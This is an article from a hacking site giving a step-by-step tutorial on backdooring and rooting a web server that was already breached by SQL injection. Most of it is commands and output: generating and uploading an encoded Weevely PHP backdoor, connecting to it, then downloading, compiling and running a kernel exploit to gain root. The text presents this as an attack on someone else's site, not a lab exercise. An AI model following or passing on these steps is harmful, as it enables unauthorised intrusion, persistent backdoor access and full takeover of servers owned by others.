Main » Articles » Web Hacking » Server Rooting

BackDoor & Rooting With Backtrack
Today I'm going to post a tutorial Related to Backdoor Via Backtrack 5.
Now for this you need A Virtual Machine Install with Backtrack 5.

Lets Start..
Assume our target site :
Now we have hacked admin panel of site via SQL injection. The site was sql vulnerable (Assumption)

Admin Panel:

After logging into the admin panel we have uploaded our shell (r57.php)
shell location on server:

Run you Vmware >> Backtrack 5...
The game starts now.. 
Backdooring a server with encrypted php backdoor.. amazing !

root@bt:~# cd /pentest/backdoors/web/weevely

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers

-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file

root@bt:/pentest/backdoors/web/weevely# ./ -g -o /root/Desktop/bdoor.php -p rustles

+ Backdoor file ‘bdoor.php ’ created with password ‘rustles".Now go and check your desktop. There will be a encrypted php file bdoor.php .

=>FireFox ---> ---> Upload bdoor.php
=>FireFox ---> ---> bdoor.php location

Now we have to connect to our encrypted bdoor.php

root@bt:/pentest/backdoors/web/weevely# ./ -t - u -p rustles

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers

+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[] ls
Director listing Successful.

[] mkdir tmp
Directory tmp successfully created!!

[] cd tmp
[] mkdir pcp

Directory pcp Successfully Created.

[] cd pcp
[] uname -r / -a

Linux 2.6.32 kernel (Assume)

Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c
[] ls
Directory Successfully listed.
[] gcc 2.6.32.c -o hackall
[] ./hackall

[] id
uid=(root) gid=(root)
[]  Rooted 


Special ThanX to GeniusHaCkers
Category: Server Rooting | Added by: MaX-HaCker (12.08.28)
Views: 2008 | Comments: 1 | Rating: 5.0/1
Total comments: 1
0   Spam
1 //3Kw1N0x   (13.03.09 9:27 AM)
j00 K0p13d 73h 73X7 phr0M 3X 5173 l053rrR


Only registered users can add comments.
[ Registration | Login ]
Recommend on Google

Designed By [#]./3X3.R()()T
Like Us on Facebook Follow Us on Twitter Subscribe Us on Youtube WWW.GeniusHackers.NET © 2018
Founder and CEO of GeniusHackers [#] /3x3.R()()T
Hosted by uCoz
Hosted by uCoz